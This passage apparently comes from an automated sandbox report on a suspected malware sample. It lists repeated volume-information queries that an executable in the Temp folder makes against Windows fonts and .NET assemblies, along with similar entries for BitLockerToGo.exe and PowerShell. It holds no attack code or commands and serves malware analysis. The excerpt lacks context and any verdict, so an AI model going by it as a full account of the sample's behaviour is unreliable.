                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6BC6.exe VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
